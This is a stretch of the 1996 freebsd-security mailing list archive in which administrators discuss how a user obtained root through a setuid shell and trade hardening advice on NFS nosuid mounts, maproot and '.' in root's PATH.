on the client machine. I've got my FreeBSD installs down to an hour or so by now :-) Under Digital Unix, the syntax in /etc/exports goes something like this: /exported/filesystem -root=admin.machine.1 -root=admin.machine.2 client.machine.1 client.machine.2 and so on. I haven't set up this sort of thing under FreeBSD, but I believe the -maproot option provides equivalent functionality. See exports(5) for more information. None of this addresses the potential problem of address/hostname spoofing (i.e., if someone can convince the NFS server that they are one of the administrative machines, you're in trouble), but it's better than nothing. -- Jeff Aitken jaitken@cs.vt.edu From owner-freebsd-security Tue Jun 25 09:42:51 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id JAA15754 for security-outgoing; Tue, 25 Jun 1996 09:42:51 -0700 (PDT) Received: from husky.cslab.vt.edu (jaitken@husky.cslab.vt.edu [198.82.184.10]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id JAA15747 for ; Tue, 25 Jun 1996 09:42:47 -0700 (PDT) Received: (jaitken@localhost) by husky.cslab.vt.edu (8.6.12/8.6.4) id MAA06642; Tue, 25 Jun 1996 12:42:33 -0400 From: Jeff Aitken Message-Id: <199606251642.MAA06642@husky.cslab.vt.edu> Subject: Re: The Vinnie Loophole To: hal@snitt.com (Hal Snyder) Date: Tue, 25 Jun 1996 12:42:33 -0400 (EDT) Cc: security@freebsd.org In-Reply-To: <31cffc6e.1096226166@vogon.trans.sni-usa.com> from "Hal Snyder" at Jun 25, 96 03:17:47 pm X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > 1. How about adding checks for "." or equivalent in $PATH to > /etc/security? Scan for it in .profile, .bashrc, and so forth. This > would not catch every offense but would help. I can't speak for anyone else, but that would be the first sort of "security check" I would disable (along with the damn message about not logging in as root, but to use 'su'). Useless messages like WARNING: root has "." in their path!!! filling my system logs is *not* what I consider helpful. If you put "." last in the path you should be fine. If you've got "Unix System Administrators" who are trying to use commands like DIR and REN, or are wondering why there isn't a C:\UNIX directory, well, I think you're in trouble anyway :-) -- Jeff Aitken jaitken@cs.vt.edu From owner-freebsd-security Tue Jun 25 09:48:25 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id JAA16410 for security-outgoing; Tue, 25 Jun 1996 09:48:25 -0700 (PDT) Received: from hive-queen.paccar.com (firewall-user@hive-queen.paccar.com [160.69.38.13]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id JAA16398 for ; Tue, 25 Jun 1996 09:48:23 -0700 (PDT) Received: (from uucp@localhost) by hive-queen.paccar.com (8.7.5/8.7.3) id JAA08514 for ; Tue, 25 Jun 1996 09:41:55 -0700 (PDT) Received: from mailhub.misrenton.paccar.com(160.69.10.5) by hive-queen.paccar.com via smap (V3.1) id xma008497; Tue, 25 Jun 96 09:41:28 -0700 Received: from mugwump.paccar.com (mugwump.paccar.com [160.69.30.11]) by mailhub.misrenton.paccar.com (8.7.5/8.7.3) with ESMTP id JAA28606 for ; Tue, 25 Jun 1996 09:46:12 -0700 (PDT) Received: from jane.techcenter.paccar.com (jane.techcenter.paccar.com [160.69.33.35]) by mugwump.paccar.com (8.7.5/8.7.3) with SMTP id JAA09261 for ; Tue, 25 Jun 1996 09:53:11 -0700 (PDT) Date: Tue, 25 Jun 1996 09:53:11 -0700 (PDT) Message-Id: <199606251653.JAA09261@mugwump.paccar.com> X-Sender: fletcher@mugwump.paccar.com X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: security@FreeBSD.org From: Arlen Fletcher Subject: Re: I need help on this one - please help me track this guy down! Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk At 08:43 AM 6/25/96 -0700, you wrote: >On Tue, 25 Jun 1996, Michael Smith wrote: > [snip] >Ok, this is jb. First off all this copied from here to their as root >didn't happen. I gave this fella an account knowing more than likely if >we had a hole he would find it. Unfortunately I wasn't watching his tty >when he actually used whatever exploit he used. He obviously used a >setuid exploit so I suggest that there is a New exploit out abusing a >setuid program somewhere on the system because I know vince fixed the >mount_union and current fixed the old ypwhich hack. Or actually maybe not >so old for some of you, but either way I did have to give him an account >before he could do anything. However, once inside it took him 2 minutes >and he was root. I know for a fact it was his FIRST look inside the Did you by any chance check the history file? I presume he vaporized it, but you never know.... Of course it's 20/20 hindsight, but copying the history file somewhere else when you see a user doing something bizarre (like becomming root) might be worth thinking about in the future. ----------------------------------------------------------------- Opinions expressed in this message are mine and not necessarily those of my employer. ----------------------------------------------------------------- Arlen Fletcher N7YIM fletcher@paccar.com From owner-freebsd-security Tue Jun 25 10:01:16 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id KAA17620 for security-outgoing; Tue, 25 Jun 1996 10:01:16 -0700 (PDT) Received: from eldorado.net-tel.co.uk (eldorado.net-tel.co.uk [193.122.171.253]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id KAA17607 for ; Tue, 25 Jun 1996 10:01:03 -0700 (PDT) From: Andrew.Gordon@net-tel.co.uk Received: (from root@localhost) by eldorado.net-tel.co.uk (8.6.12/8.6.10) id RAA13900; Tue, 25 Jun 1996 17:58:30 +0100 Received: from "/PRMD=NET-TEL/ADMD=GOLD 400/C=GB/" by net-tel.co.uk (Route400-RFCGate); Tue, 25 Jun 96 17:53:37 +0100 X400-Received: by mta "eldorado" in "/PRMD=net-tel/ADMD=gold 400/C=gb/"; Relayed; Tue, 25 Jun 96 17:53:37 +0100 X400-Received: by mta "net-tel cambridge" in "/PRMD=net-tel/ADMD=gold 400/C=gb/"; Relayed; Tue, 25 Jun 96 16:53:35 +0000 X400-Received: by "/PRMD=NET-TEL/ADMD=Gold 400/C=GB/"; Relayed; Tue, 25 Jun 96 16:53:35 +0000 X400-MTS-Identifier: ["/PRMD=NET-TEL/ADMD=Gold 400/C=GB/";hst:17886-960625165335-70F1] X400-Content-Type: P2-1984 (2) X400-Originator: Andrew.Gordon@net-tel.co.uk Original-Encoded-Information-Types: IA5-Text X400-Recipients: non-disclosure:; Date: Tue, 25 Jun 96 16:53:35 +0000 X400-Content-Identifier: NFS attacks (was Message-Id: <"1847-960625165357-701E*/G=Andrew/S=Gordon/O=NET-TEL Computer Systems Ltd/PRMD=NET-TEL/ADMD=Gold 400/C=GB/"@MHS> To: "Jeff Aitken" Cc: security@freebsd.org In-Reply-To: <199606251626.MAA06583@husky.cslab.vt.edu> Subject: NFS attacks (was: Re(4): I need help on this one - please help me track this guy down!) Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > > But what file transfer mechanism was used? NFS maybe? > > > > Personally, I like to mount all NFS filesystems "nosuid" - and likewise > > for all local systems exported by NFS (I don't normally export / or > > /usr). Most users have no business creating setuid programs in their > > filespace, and such a policy would most likely have prevented this > > breach even if the setuid binary was created by some other means. > > One thing you can do to help with this sort of problem is to map UID 0 > to some other UID. In our lab, we've got an AlphaStation which exports > several filesystems via NFS. On a few administrative-type machines, we > map UID 0 to UID 0 (so that root on any of the administrative machines > can alter files as needed) but on the client machines (i.e., those > machines used primarily by lab patrons) UID 0 is mapped to 'nobody' or The mode of attack I was suggesting was untrusted machine as server, machine-under-attack as client. Maproot wouldn't help in this case, as it applies at the wrong end. > somesuch. Furthermore, only system administrators have accounts on the > servers; thus, even if someone breaks root on a client machine in the > lab, they can't install any sort of backdoor on the server. If/when This is good, if you can accept that limitation. On hosts where users do have logins, maproot is only part of the answer, since quite a lot of damage can be done by just being setuid to 'bin' (or 'news' or 'www' according to cicumstance). Also, it sounds like in your environment you can (already do?) block NFS traffic from outside the network of machines you control. In the situation where the "suid shell" attack succeeded, we are given to understand that the attacker had his own machine readily accessible over the network - though whether NFS was involved has not yet been revealed. From owner-freebsd-security Tue Jun 25 10:45:13 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id KAA21859 for security-outgoing; Tue, 25 Jun 1996 10:45:13 -0700 (PDT) Received: from xmission.xmission.com (softweyr@xmission.xmission.com [198.60.22.2]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id KAA21847 for ; Tue, 25 Jun 1996 10:45:09 -0700 (PDT) Received: (from softweyr@localhost) by xmission.xmission.com (8.7.5/8.7.5) id LAA24692; Tue, 25 Jun 1996 11:44:19 -0600 (MDT) From: Barnacle Wes Message-Id: <199606251744.LAA24692@xmission.xmission.com> Subject: Re: The Vinnie Loophole To: davidg@Root.COM Date: Tue, 25 Jun 1996 11:44:19 -0600 (MDT) Cc: hal@snitt.com, security@freebsd.org In-Reply-To: <199606251538.IAA19357@root.com> from "David Greenman" at Jun 25, 96 08:38:29 am X-Mailer: ELM [version 2.4 PL25] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk % Re: Trojan horse programs that get executed because "." is in PATH % somewhere: % % The fact that this well-known, easily plugged loophole is being % rediscovered by new admins (probably daily) suggests that we *could* % do something more proactive to keep it from happening. % % 1. How about adding checks for "." or equivalent in $PATH to % /etc/security? Scan for it in .profile, .bashrc, and so forth. This % would not catch every offence but would help. > It's appropriate for some environments and not for others. I certainly > wouldn't want the kernel involved in this in any case, and things that do > scans through your filesystems need to be carefully controlled. Some systems > have so much disk space and NFS that the scan wouldn't complete within the > 24 hour time period. Something like (1), if implemented, should not be enabled > by default. I worked on the code that did this in Security Toolkit/UNIX for months, so did the other two programmers. This is very difficult to do correctly, and if you do it wrong, you're just giving out a false sense of security. In my experience, when you tell someone their computer is "secure" and then they get hacked, they get *really pissed* at you, regardless of whether you said anything about how they got hacked or not. ;^) -- Wes Peters | Yes I am a pirate, two hundred years too late Softweyr | The cannons don't thunder, there's nothing to plunder Consulting | I'm an over forty victim of fate... softweyr@xmission.com | Jimmy Buffett From owner-freebsd-security Tue Jun 25 11:17:40 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id LAA24994 for security-outgoing; Tue, 25 Jun 1996 11:17:40 -0700 (PDT) Received: from dns1.noc.best.net (root@dns1.noc.best.net [206.86.8.69]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id LAA24989 for ; Tue, 25 Jun 1996 11:17:38 -0700 (PDT) Received: from shellx.best.com (shellx.best.com [206.86.0.11]) by dns1.noc.best.net (8.6.12/8.6.5) with ESMTP id LAA08889; Tue, 25 Jun 1996 11:17:30 -0700 Received: from edge.minimax.com (minimax.vip.best.com [205.149.169.111]) by shellx.best.com (8.6.12/8.6.5) with SMTP id LAA29401; Tue, 25 Jun 1996 11:15:35 -0700 Message-Id: <199606251815.LAA29401@shellx.best.com> X-Sender: jasonc@best.com X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 25 Jun 1996 12:26:47 -0700 To: davidg@Root.COM From: Jason Campbell Subject: Re: The Vinnie Loophole Cc: security@freebsd.org Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Regarding adding checks in /etc/security to scan for '.' in PATH statements, it could be done more simply: 1. /etc/security needs to check for '.' in PATH in the config files in root's home dir. (but nowhere else) 2. 'su' should check for '.' in the PATH when the you're becoming root and warn if it's there (and maybe even take it out). Putting more code in exec() to do this sounds like a really bad idea given how often it's called, and could break things which, for whatever reason, intend to exec something in the current dir. Jason. At 08:38 AM 6/25/96 -0700, you wrote: >>Re: Trojan horse programs that get executed because "." is in PATH >>somewhere: >> >>The fact that this well-known, easily plugged loophole is being >>rediscovered by new admins (probably daily) suggests that we *could* >>do something more proactive to keep it from happening. >> >>1. How about adding checks for "." or equivalent in $PATH to >>/etc/security? Scan for it in .profile, .bashrc, and so forth. This >>would not catch every offence but would help. >> >>2. At appropriate securelevel, have exec() fail with explanation to >>syslog if there is no "/" in argv[0]. How much code would [should] >>this break? Is this a horrible idea? > > It's appropriate for some environments and not for others. I certainly >wouldn't want the kernel involved in this in any case, and things that do >scans through your filesystems need to be carefully controlled. Some systems >have so much disk space and NFS that the scan wouldn't complete within the >24 hour time period. Something like (1), if implemented, should not be enabled >by default. > >-DG > >David Greenman >Core-team/Principal Architect, The FreeBSD Project > > From owner-freebsd-security Tue Jun 25 11:44:28 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id LAA27715 for security-outgoing; Tue, 25 Jun 1996 11:44:28 -0700 (PDT) Received: from husky.cslab.vt.edu (jaitken@husky.cslab.vt.edu [198.82.184.10]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id LAA27708 for ; Tue, 25 Jun 1996 11:44:24 -0700 (PDT) Received: (jaitken@localhost) by husky.cslab.vt.edu (8.6.12/8.6.4) id OAA06978; Tue, 25 Jun 1996 14:44:06 -0400 From: Jeff Aitken Message-Id: <199606251844.OAA06978@husky.cslab.vt.edu> Subject: Re: The Vinnie Loophole To: softweyr@xmission.com (Barnacle Wes) Date: Tue, 25 Jun 1996 14:44:06 -0400 (EDT) Cc: security@freebsd.org In-Reply-To: <199606251748.LAA25282@xmission.xmission.com> from "Barnacle Wes" at Jun 25, 96 11:48:52 am X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > You obviously aren't very concerned about security. Not true at all. Perhaps I should clarify my objection: I'm aware of the potential security risk associated with having "." in root's path. If you want to make that impossible, so be it. I don't have it in root's path on machines I administer in any case. What I specifically did *not* want to see were what I consider "useless" messages filling up the system logs. Log digestion is difficult enough as it is, as I'm sure you (or any other good admin) are already aware. AFAIK, FreeBSD doesn't come standard with "." in root's path. So the only people who would suffer from this (potential) vulnerability are the ones who *deliberately* put "." in the path! I suppose that, by the same argument, I shouldn't care about it, since I won't ever see the message. :-) What I really wanted to point out is that filling up system logs with lots of (potentially) useless information is not a good idea (IMHO). I suppose we'll just have to agree to disagree on this point. -- Jeff Aitken jaitken@cs.vt.edu From owner-freebsd-security Tue Jun 25 12:53:46 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id MAA07153 for security-outgoing; Tue, 25 Jun 1996 12:53:46 -0700 (PDT) Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id MAA07133 for ; Tue, 25 Jun 1996 12:53:42 -0700 (PDT) Received: (from jbhunt@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id MAA09401; Tue, 25 Jun 1996 12:52:24 -0700 (PDT) Date: Tue, 25 Jun 1996 12:52:24 -0700 (PDT) From: jbhunt To: Mark Murray cc: Michael Smith , -Vince- , mark@grondar.za, security@FreeBSD.ORG, chad@mercury.gaianet.net Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: <199606251613.SAA10099@grumble.grondar.za> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Tue, 25 Jun 1996, Mark Murray wrote: > [hackers removed from cc: - the crosspost is getting a bit much there] > > jbhunt wrote: > > Ok, this is jb. First off all this copied from here to their as root > > didn't happen. I gave this fella an account knowing more than likely if > > we had a hole he would find it. Unfortunately I wasn't watching his tty > > when he actually used whatever exploit he used. > > Ok... > > > He obviously used a > > setuid exploit so I suggest that there is a New exploit out abusing a > > setuid program somewhere on the system because I know vince fixed the > > mount_union and current fixed the old ypwhich hack. > > Not so fast. You didn't see what he did, but you are claiming suid. > maybe, maybe not. You don't _know_. > > > Or actually maybe not > > so old for some of you, but either way I did have to give him an account > > before he could do anything. However, once inside it took him 2 minutes > > and he was root. I know for a fact it was his FIRST look inside the > > system and I ran no scripts from his dir. > > How do you know? If "." is in your path, you run a script from wherever > you are - /tmp, /var/tmp, /var/mail if you have made that world writable > etc. What other world writable directories do you have? what runs out > of cron? What is automatically executed when you run emacs? vi? what > is your EDITOR setting for vipw? Do you read your daily security report? > > Create a new suid file and see if it is reoported the next day. > > > That option is out so don't > > bother. I did start watching his tty after he took root but it was too > > late. I am open to any suggestions any of you have so far this seems to > > be a very constructive group :> > > The most constructive suggestion at the moment is to look for your own > mistakes, and be more open to them. So far it seems you (collectively) > have made lots, but aren't admitting this - even to yourselves. > > Ask him what he did - maybe he'll even tell you? :-) If it is a FreeBSD > security hole, We'll all thank him and you for finding it :-). > > M > -- > Mark Murray > 46 Harvey Rd, Claremont, Cape Town 7700, South Africa > +27 21 61-3768 GMT+0200 > Finger mark@grondar.za for PGP key > Yes I read the security reports as I said it hasn't been reporting any unusual suid programs. No, he won't tell me I already asked of course. As vince stated we are remote admin's we both have to su to root so the only person on the actual console is chad. As for running a script I know for a fact that I wasn't running anything at the time. I know this guys methods for the most part so I am almost sure he has some new exploit. He also claims to have one that EVERY linux box is vulnerable to of course he won't tell me or give it to me. John SysAdmin Gaianet From owner-freebsd-security Tue Jun 25 13:03:54 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id NAA09659 for security-outgoing; Tue, 25 Jun 1996 13:03:54 -0700 (PDT) Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id NAA09613; Tue, 25 Jun 1996 13:03:43 -0700 (PDT) Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id NAA11159; Tue, 25 Jun 1996 13:03:06 -0700 (PDT) Date: Tue, 25 Jun 1996 13:03:06 -0700 (PDT) From: -Vince- To: "Eric J. Schwertfeger" cc: Mark Murray , hackers@FreeBSD.ORG, security@FreeBSD.ORG, Chad Shackley , jbhunt Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Tue, 25 Jun 1996, Eric J. Schwertfeger wrote: > On Tue, 25 Jun 1996, -Vince- wrote: > > > Yeah, you have a point but jbhunt was watching the user as he > > hacked root since he brought the file from his own machine.... so that > > wasn't something the admin was tricked into doing.. > > Then the important question is, how did he move the file so that it > retained the setuid bit? We're already pretty sure that the program is > only /bin/sh with the setuid bit turned on. So either he found a way to > move the file with the bit turned on, or he found a way to turn it on, > which reqires root access. It was a remote login so he had to transfer it over somehow... Vince From owner-freebsd-security Tue Jun 25 13:15:20 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id NAA11670 for security-outgoing; Tue, 25 Jun 1996 13:15:20 -0700 (PDT) Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id NAA11652 for ; Tue, 25 Jun 1996 13:15:14 -0700 (PDT) Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id NAA13032; Tue, 25 Jun 1996 13:14:43 -0700 (PDT) Date: Tue, 25 Jun 1996 13:14:42 -0700 (PDT) From: -Vince- To: mark thompson cc: hackers@freefall.freebsd.org, Chad Shackley , jbhunt , security@freebsd.org Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: <199606251403.HAA15335@squirrel.tgsoft.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Tue, 25 Jun 1996, mark thompson wrote: > It seems that -Vince- said: > > > > On Tue, 25 Jun 1996, Don Yuniskis wrote: > > > > > It seems that -Vince- said: > > > > Hmmm, that's only if we had phone support.... We don't :) but do > > > > admins really go run a program that the user said won't run? > > > > > > Well, it *appears* that one of *you* did! :> > > > > Well, jbhunt was the one who gave the user the account and the > > user just transferred the root which is /bin/sh with setuid and ran it > > and he got root.... > > Once upon a time, one of our nice users brought in a tape he wanted > read. One of the guys logged in as root, hung the tape and untarred it > into the nice user's directory. > > The tape contained a shell that was setuid root... but we didn't > discover that 'till later. > > Seems this guy didn't want to *break* anything, but just wanted to admin > the machine himself, being dissatisfied with us. Anyway, i learned > several valuable lessons: > > 1) Scan the machine for setuid programs. Often. > > 2) Read user's tapes when logged in as the user. > > 3) If you are running a computer system, trust nobody. This is very true.... Vince From owner-freebsd-security Tue Jun 25 13:27:49 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id NAA14233 for security-outgoing; Tue, 25 Jun 1996 13:27:49 -0700 (PDT) Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id NAA14202 for ; Tue, 25 Jun 1996 13:27:39 -0700 (PDT) Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id NAA15269; Tue, 25 Jun 1996 13:27:02 -0700 (PDT) Date: Tue, 25 Jun 1996 13:27:02 -0700 (PDT) From: -Vince- To: Andrew.Gordon@net-tel.co.uk cc: security@freebsd.org, jbhunt , Chad Shackley Subject: Re: Re(2): I need help on this one - please help me track this guy down! In-Reply-To: <"811-960625150230-D047*/G=Andrew/S=Gordon/O=NET-TEL Computer Systems Ltd/PRMD=NET-TEL/ADMD=Gold 400/C=GB/"@MHS> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Tue, 25 Jun 1996 Andrew.Gordon@net-tel.co.uk wrote: > > -Vince- stands accused of saying: > > > > > > Yeah, you have a point but jbhunt was watching the user as he > > > hacked root since he brought the file from his own machine.... so that > > > wasn't something the admin was tricked into doing.. > > But what file transfer mechanism was used? NFS maybe? > > Certainly a simple NFS mount of an untrusted machine is a dangerous thing to do, since setuids on those files will be obeyed. Maybe you allow this via an incautious AMD map? > > Personally, I like to mount all NFS filesystems "nosuid" - and likewise for all local systems exported by NFS (I don't normally export / or /usr). Most users have no business creating setuid programs in their filespace, and such a policy would most likely have prevented this breach even if the setuid binary was created by some other means. Probably ftp using a compressed tar or gzipped tar binary... Vince From owner-freebsd-security Tue Jun 25 13:29:19 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id NAA14619 for security-outgoing; Tue, 25 Jun 1996 13:29:19 -0700 (PDT) Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id NAA14569; Tue, 25 Jun 1996 13:29:07 -0700 (PDT) Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id NAA15405; Tue, 25 Jun 1996 13:28:02 -0700 (PDT) Date: Tue, 25 Jun 1996 13:28:02 -0700 (PDT) From: -Vince- To: torstenb@tlk.com cc: Gary Palmer , security@freebsd.org, Chad Shackley , jbhunt Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Tue, 25 Jun 1996, Torsten Blum wrote: > Gary Palmer wrote: > > > [ CC: Trimmed ] > > > > > Yeah, that's the real question is like if he can transfer the > > > binary from another machine and have it work... other people can do the > > > same thing and gain access to FreeBSD boxes as root as long as they have > > > a account on that machine... > > > > Sort of. You need root access in the first place to create a suid root > > shell... It could be an old exploit that is now closed (like the > > mount_union loophole)... > > Or the telnetd environment hole - it was possible to become root via telnet > without an account on the target machine. What was the telnetd hole? Vince From owner-freebsd-security Tue Jun 25 13:31:40 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id NAA15195 for security-outgoing; Tue, 25 Jun 1996 13:31:40 -0700 (PDT) Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id NAA15184 for ; Tue, 25 Jun 1996 13:31:37 -0700 (PDT) Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id NAA15936; Tue, 25 Jun 1996 13:31:04 -0700 (PDT) Date: Tue, 25 Jun 1996 13:31:04 -0700 (PDT) From: -Vince- To: Arlen Fletcher cc: security@freebsd.org, jbhunt , Chad Shackley Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: <199606251653.JAA09261@mugwump.paccar.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Tue, 25 Jun 1996, Arlen Fletcher wrote: > At 08:43 AM 6/25/96 -0700, you wrote: > >On Tue, 25 Jun 1996, Michael Smith wrote: > > > [snip] > > >Ok, this is jb. First off all this copied from here to their as root > >didn't happen. I gave this fella an account knowing more than likely if > >we had a hole he would find it. Unfortunately I wasn't watching his tty > >when he actually used whatever exploit he used. He obviously used a > >setuid exploit so I suggest that there is a New exploit out abusing a > >setuid program somewhere on the system because I know vince fixed the > >mount_union and current fixed the old ypwhich hack. Or actually maybe not > >so old for some of you, but either way I did have to give him an account > >before he could do anything. However, once inside it took him 2 minutes > >and he was root. I know for a fact it was his FIRST look inside the > > > Did you by any chance check the history file? I presume he vaporized it, > but you never know.... I did but he didn't have a history file.. > Of course it's 20/20 hindsight, but copying the history file somewhere > else when you see a user doing something bizarre (like becomming root) > might be worth thinking about in the future. Yeah, I always check the history file... Vince From owner-freebsd-security Tue Jun 25 13:39:43 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id NAA16566 for security-outgoing; Tue, 25 Jun 1996 13:39:43 -0700 (PDT) Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id NAA16548 for ; Tue, 25 Jun 1996 13:39:39 -0700 (PDT) Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id NAA17828; Tue, 25 Jun 1996 13:39:04 -0700 (PDT) Date: Tue, 25 Jun 1996 13:39:04 -0700 (PDT) From: -Vince- To: jbhunt cc: Mark Murray , Michael Smith , mark@grondar.za, security@FreeBSD.ORG, chad@mercury.gaianet.net Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Tue, 25 Jun 1996, jbhunt wrote: > On Tue, 25 Jun 1996, Mark Murray wrote: > > > [hackers removed from cc: - the crosspost is getting a bit much there] > > > > jbhunt wrote: > > > Ok, this is jb. First off all this copied from here to their as root > > > didn't happen. I gave this fella an account knowing more than likely if > > > we had a hole he would find it. Unfortunately I wasn't watching his tty > > > when he actually used whatever exploit he used. > > > > Ok... > > > > > He obviously used a > > > setuid exploit so I suggest that there is a New exploit out abusing a > > > setuid program somewhere on the system because I know vince fixed the > > > mount_union and current fixed the old ypwhich hack. > > > > Not so fast. You didn't see what he did, but you are claiming suid. > > maybe, maybe not. You don't _know_. > > > > > Or actually maybe not > > > so old for some of you, but either way I did have to give him an account > > > before he could do anything. However, once inside it took him 2 minutes > > > and he was root. I know for a fact it was his FIRST look inside the > > > system and I ran no scripts from his dir. > > > > How do you know? If "." is in your path, you run a script from wherever > > you are - /tmp, /var/tmp, /var/mail if you have made that world writable > > etc. What other world writable directories do you have? what runs out > > of cron? What is automatically executed when you run emacs? vi? what > > is your EDITOR setting for vipw? Do you read your daily security report? the directories world writeable are /tmp and /var/tmp.... /var/mail isn't. nothing runs out of cron since we don't allow crontabs from anyone other than root. We don't have emacs installed and vi just runs /usr/bin/vi. vipw is using vi... and we do read out daily security report... > > Create a new suid file and see if it is reoported the next day. > > > > > That option is out so don't > > > bother. I did start watching his tty after he took root but it was too > > > late. I am open to any suggestions any of you have so far this seems to > > > be a very constructive group :> > > > > The most constructive suggestion at the moment is to look for your own > > mistakes, and be more open to them. So far it seems you (collectively) > > have made lots, but aren't admitting this - even to yourselves. > > > > Ask him what he did - maybe he'll even tell you? :-) If it is a FreeBSD > > security hole, We'll all thank him and you for finding it :-). > > > Yes I read the security reports as I said it hasn't been reporting any > unusual suid programs. No, he won't tell me I already asked of course. As > vince stated we are remote admin's we both have to su to root so the only > person on the actual console is chad. As for running a script I know for > a fact that I wasn't running anything at the time. I know this guys > methods for the most part so I am almost sure he has some new exploit. He > also claims to have one that EVERY linux box is vulnerable to of course > he won't tell me or give it to me. Vince From owner-freebsd-security Tue Jun 25 14:29:52 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id OAA22844 for security-outgoing; Tue, 25 Jun 1996 14:29:52 -0700 (PDT) Received: from gallup.cia-g.com (root@gallup.cia-g.com [206.206.162.10]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id OAA22838 for ; Tue, 25 Jun 1996 14:29:50 -0700 (PDT) Received: from gallup.cia-g.com (gallup.cia-g.com [206.206.162.10]) by gallup.cia-g.com (8.6.11/8.6.9) with SMTP id PAA25852 for ; Tue, 25 Jun 1996 15:31:07 -0600 Date: Tue, 25 Jun 1996 15:31:07 -0600 (MDT) From: Stephen Fisher To: freebsd-security@freebsd.org Subject: List of freebsd security advisories? Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Hello, Anyone have an archive of the FreeBSD security advisories? I'd like to be able to fix the problems on newly installed 2.1R systems. - Steve - Systems Manager - Community Internet Access - http://www.cia-g.com From owner-freebsd-security Tue Jun 25 